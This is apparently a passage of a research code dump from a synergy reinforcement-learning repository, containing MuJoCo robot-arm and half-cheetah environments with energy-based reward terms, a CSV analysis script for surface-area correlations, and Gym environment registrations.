#self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [(p1x - p2x) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1x + p2x) / 2, 0,(p1y - p2y) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1y + p2y) / 2] # ,phi=1
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'penalty_wrist': self.wrist_cost_weight * reward_wristrot,
'penalty_MinE': self.MinE_cost_weight *penalty_MinE,
'ori_reward': ori_reward
}
return ob, reward, done, info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:5]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[5:],
self.sim.data.qvel.flat[:5],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm4dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,MinE_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction', 's_flexion', 's_rotation', 'e_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.shoulder_cost_weight=shoulder_cost_weight
self.distance_reward_weight=distance_reward_weight
self.MinE_cost_weight =MinE_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
#reward_wristrot = - np.square(total_torque[4::]).sum()
#meanEff=np.abs(total_torque).sum()/len(self.joint_list)
#penalty_MinE=-(np.abs(total_torque)-meanEff).sum()
penalty_MinE=- np.sum(np.square(total_torque))#self.control_cost(action)
# penalty_MinE = 0
# for i in range(len(self.joint_list)):
# delta_theta = np.abs( self.sim.data.qvel.flat[i])
# # energy = energy + np.abs(action[i]) * delta_theta
# penalty_MinE = penalty_MinE + np.abs(total_torque[i]) * delta_theta
# penalty_MinE= -penalty_MinE
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder
#+ self.wrist_cost_weight*reward_wristrot
ori_reward=reward
reward = ori_reward+self.MinE_cost_weight *penalty_MinE
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'penalty_MinE': self.MinE_cost_weight * penalty_MinE,
'ori_reward': ori_reward
}
return ob, reward, done,info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:4]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[4:],
self.sim.data.qvel.flat[:4],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm3dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm3dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = [ 's_flexion', 's_rotation', 'e_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.shoulder_cost_weight=shoulder_cost_weight
self.distance_reward_weight=distance_reward_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:2]).sum()
#reward_wristrot = - np.square(total_torque[4::]).sum()
        reward = self.distance_reward_weight * reward_dist \
            + self.shoulder_cost_weight * reward_shoulder
        # + self.wrist_cost_weight*reward_wristrot  (no wrist term in this 3-DoF arm)
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
#self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [(p1x - p2x) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1x + p2x) / 2, 0,(p1y - p2y) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1y + p2y) / 2] # ,phi=1
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'ori_reward': reward
}
return ob, reward, done, info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[2] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:3]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[3:],
self.sim.data.qvel.flat[:3],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
``` |
{
"source": "JiazhengChai/synergy_DRL",
"score": 2
} |
#### File: examples/plotting/AdaptiveW_process_SA.py
```python
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.metrics import r2_score
from matplotlib import pyplot as plt
import os
from matplotlib.lines import Line2D
from exp_variant_class import exp_variant#,PCA
from sklearn.decomposition import PCA
import argparse
from scipy import integrate
import csv
from scipy.stats import pearsonr
import pandas as pd
def gauss(x, mu, a = 1, sigma = 1/6):
return a * np.exp(-(x - mu)**2 / (2*sigma**2))
def R2():
return r'R^{{{e:d}}}'.format(e=int(2))
cmap = plt.cm.viridis
cmaplist = [cmap(i) for i in range(cmap.N)]
cmaplen=len(cmaplist)
color_list=['b','r','g','c','m','y','k','#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628', '#f781bf']
plt.rcParams["figure.figsize"] = (10,8)
parser = argparse.ArgumentParser()
parser.add_argument('--agentt',
type=str,choices=['HCheavy','HC','A','Antheavy','FC','Ctp','G','HC_E1'])
args = parser.parse_args()
tif=False
sortt=False
standscale=True
temporal=True
manual_pca=False
recon_num=8
ori_total_vec_rsq=9
truncated_start=200
dll=50
std=True
agentt=args.agentt
precheck=False
if 'HC' in agentt:
total_vec = 6
total_chk=30
ori_final = 3000
ori_begin = 100
ori_step = 100
x_speed_index=8
desired_dist=500
if 'E1' in agentt:
agentt_folder='HC_E1'
elif 'heavy' in agentt:
agentt_folder = 'HCheavy'
else:
agentt_folder = 'HC'
elif 'FC' in agentt:
total_vec = 12
total_chk=30
ori_final = 3000
ori_begin = 100
ori_step = 100
x_speed_index=14
desired_dist=500
agentt_folder='FC'
top_folder=agentt
file_path=os.path.abspath(os.getcwd())
path_list=file_path.split('/')
while path_list[-1] !="synergyDRL":
path_list.pop(-1)
cwd="/".join(path_list)
path_to_folder=cwd+'/experiments_results/Synergy/all_csv/raw_csv'
final = ori_final
begin = ori_begin
step = ori_step
path_to_csv=path_to_folder+'/'+agentt_folder
output_folder=cwd+'/experiments_results/Synergy/all_csv/process_SA_intermediate/'+agentt
if not os.path.exists(output_folder):
os.makedirs(output_folder, exist_ok=True)
process_csv = open(output_folder+ '/' + agentt +'_process_all_surface.csv', 'w')
writer = csv.writer(process_csv, lineterminator='\n')
writer.writerow(['Trials', 'Corr SA_P', 'Corr SA_PI', 'Corr SA_E','FSA', 'DSA', 'ASA','FP', 'FPI', 'FE'])
TD3_data=[]
for csv_ in os.listdir(path_to_csv):
current_csv = pd.read_csv(path_to_csv + '/' + csv_)
current_name_list=csv_.split('_')
current_name_list=current_name_list[0:-2]
name=''
for cn in current_name_list:
name=name+cn+'_'
name=name[0:-1]
P_list = current_csv['P']
PI_list = current_csv['PI']
E_list = current_csv['E']
SA_list = current_csv['Surface Area']
Checkpoint_list = current_csv['Checkpoint']
P_list = np.asarray(P_list)
PI_list = np.asarray(PI_list)
E_list = np.asarray(E_list)
SA_list = np.asarray(SA_list)
Checkpoint_list = np.asarray(Checkpoint_list)
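    # Pearson correlations between the surface-area trajectory and the
    # P, PI and E columns across checkpoints.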
corr_SA_P = np.corrcoef(SA_list, P_list)[0, 1]
corr_SA_PI = np.corrcoef(SA_list, PI_list)[0, 1]
corr_SA_E = np.corrcoef(SA_list, E_list)[0, 1]
FP = P_list[0]
FPI = PI_list[0]
FE = E_list[0]
FSA = SA_list[0]
DSA = SA_list[0] - SA_list[-1]
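    # ASA: the largest-magnitude difference in surface area over all ordered
    # checkpoint pairs (kept negative only if the negative excursion dominates).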
SA_list2 = np.copy(SA_list)
ASA = 0
neg_ASA = 0
for sa in SA_list:
for sa2 in SA_list2:
diff = sa - sa2
if diff >= 0 and diff > ASA:
ASA = diff
elif diff < 0:
if diff < neg_ASA:
neg_ASA = diff
if np.abs(neg_ASA) > ASA:
ASA = neg_ASA
if 'TD3' not in name:
writer.writerow([name,corr_SA_P,corr_SA_PI,corr_SA_E,FSA,DSA,ASA,FP,FPI,FE])
else:
TD3_data.append([name,corr_SA_P,corr_SA_PI,corr_SA_E,FSA,DSA,ASA,FP,FPI,FE])
for row in TD3_data:
writer.writerow(row)
process_csv.close()
```
#### File: environments/gym/__init__.py
```python
import gym
CUSTOM_GYM_ENVIRONMENTS_PATH = __package__
MUJOCO_ENVIRONMENTS_PATH = f'{CUSTOM_GYM_ENVIRONMENTS_PATH}.mujoco'
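# Each spec below pairs a Gym environment id with the entry point of a custom
# MuJoCo environment class; presumably these dicts are consumed by a
# gym.register() call elsewhere in this package (not shown here).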
MUJOCO_ENVIRONMENT_SPECS = (
{
'id': 'VMPDv2-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum_v2:VerticalMvtPendulumEnvDV2'),
},
{
'id': 'VMPD-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum:VerticalMvtPendulumDEnv'),
},
{
'id': 'VMPv2-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum_v2:VerticalMvtPendulumEnvV2'),
},
{
'id': 'VMP-E0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_mvt_pendulum:VerticalMvtPendulumEnv'),
},
{
'id': 'Swimmer-Parameterizable-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.swimmer:SwimmerEnv'),
},
{
'id': 'Swimmer-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.swimmer:SwimmerEnv'),
},
{
'id': 'Hopper-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Hopper-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.hopper:HopperEnv'),
},
{
'id': 'Bipedal2d-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.bipedal_2:Bipedal2Env'),
},
{
'id': 'Walker2d-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergyFour-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'Walker2d-EnergySix-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.walker2d:Walker2dEnv'),
},
{
'id': 'HalfCheetah-EnergySix-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyFour-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-EnergyPoint1-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv'),
},
{
'id': 'HalfCheetah5dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_5dof'),
},
{
'id': 'HalfCheetah4dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_4dof'),
},
{
'id': 'HalfCheetah3doff-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_3doff'),
},
{
'id': 'HalfCheetah3dofb-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_3dofb'),
},
{
'id': 'HalfCheetah2dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv_2dof'),
},
{
'id': 'Giraffe-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.giraffe:GiraffeEnv'),
},
{
'id': 'HalfCheetahHeavy-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahHeavyEnv'),
},
{
'id': 'VA-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA'),
},
{
'id': 'VA4dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA4dof'),
},
{
'id': 'VA6dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA6dof'),
},
{
'id': 'VA8dof-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.vertical_arm:VA8dof'),
},
{
'id': 'Centripede-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.centripede:CentripedeEnv'),
},
{
'id': 'FullCheetah-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:FullCheetahEnv'),
},
{
'id': 'HalfCheetah-PerfIndex-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv2'),
},
{
'id': 'HalfCheetah-InvPerfIndex-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.half_cheetah:HalfCheetahEnv3'),
},
{
'id': 'Ant-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'AntHeavy-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntHeavyEnv'),
},
{
'id': 'Ant-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Ant-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Ant-EnergyOnePoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Ant-EnergyTwo-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.ant:AntEnv'),
},
{
'id': 'Humanoid-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyPoint5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyPoint1-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoid-EnergyPz5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-Energy0-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyOne-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyP5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyP1-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Humanoidrllab-EnergyPz5-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.humanoid_rllab:HumanoidEnv'),
},
{
'id': 'Pusher2d-Default-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.pusher_2d:Pusher2dEnv'),
},
{
'id': 'Pusher2d-DefaultReach-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.pusher_2d:ForkReacherEnv'),
},
{
'id': 'Pusher2d-ImageDefault-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.image_pusher_2d:ImagePusher2dEnv'),
},
{
'id': 'Pusher2d-ImageReach-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.image_pusher_2d:ImageForkReacher2dEnv'),
},
{
'id': 'Pusher2d-BlindReach-v0',
'entry_point': (f'{MUJOCO_ENVIRONMENTS_PATH}'
'.image_pusher_2d:BlindForkReacher2dEnv'),
},
)
GENERAL_ENVIRONMENT_SPECS = (
{
'id': 'MultiGoal-Default-v0',
'entry_point': (f'{CUSTOM_GYM_ENVIRONMENTS_PATH}'
'.multi_goal:MultiGoalEnv')
},
)
MULTIWORLD_ENVIRONMENT_SPECS = (
{
'id': 'Point2DEnv-Default-v0',
'entry_point': 'multiworld.envs.pygame.point2d:Point2DWallEnv'
},
{
'id': 'Point2DEnv-Wall-v0',
'entry_point': 'multiworld.envs.pygame.point2d:Point2DWallEnv'
},
)
MUJOCO_ENVIRONMENTS = tuple(
environment_spec['id']
for environment_spec in MUJOCO_ENVIRONMENT_SPECS)
GENERAL_ENVIRONMENTS = tuple(
environment_spec['id']
for environment_spec in GENERAL_ENVIRONMENT_SPECS)
MULTIWORLD_ENVIRONMENTS = tuple(
environment_spec['id']
for environment_spec in MULTIWORLD_ENVIRONMENT_SPECS)
GYM_ENVIRONMENTS = (
*MUJOCO_ENVIRONMENTS,
*GENERAL_ENVIRONMENTS,
*MULTIWORLD_ENVIRONMENTS,
)
def register_mujoco_environments():
"""Register softlearning mujoco environments."""
for mujoco_environment in MUJOCO_ENVIRONMENT_SPECS:
gym.register(**mujoco_environment)
gym_ids = tuple(
environment_spec['id']
for environment_spec in MUJOCO_ENVIRONMENT_SPECS)
return gym_ids
def register_general_environments():
"""Register gym environments that don't fall under a specific category."""
for general_environment in GENERAL_ENVIRONMENT_SPECS:
gym.register(**general_environment)
gym_ids = tuple(
environment_spec['id']
for environment_spec in GENERAL_ENVIRONMENT_SPECS)
return gym_ids
def register_multiworld_environments():
"""Register custom environments from multiworld package."""
for multiworld_environment in MULTIWORLD_ENVIRONMENT_SPECS:
gym.register(**multiworld_environment)
gym_ids = tuple(
environment_spec['id']
for environment_spec in MULTIWORLD_ENVIRONMENT_SPECS)
return gym_ids
def register_environments():
registered_mujoco_environments = register_mujoco_environments()
registered_general_environments = register_general_environments()
registered_multiworld_environments = register_multiworld_environments()
return (
*registered_mujoco_environments,
*registered_general_environments,
*registered_multiworld_environments,
)
```
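For reference, here is a minimal usage sketch of the registration helpers above. The import path and the chosen environment id are assumptions based on a softlearning-style package layout, not something stated in this file:

```python
import gym

# Hypothetical driver script; assumes this package is importable as
# `softlearning.environments.gym` (adjust to the actual install layout).
from softlearning.environments.gym import register_environments, GYM_ENVIRONMENTS

registered_ids = register_environments()      # registers every spec with gym
assert set(registered_ids) == set(GYM_ENVIRONMENTS)

env = gym.make('HalfCheetah-Energy0-v0')      # one of the ids defined above
obs = env.reset()
obs, reward, done, info = env.step(env.action_space.sample())
```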
#### File: gym/mujoco/half_cheetah.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
DEFAULT_CAMERA_CONFIG = {
'distance': 4.0,
}
class HalfCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
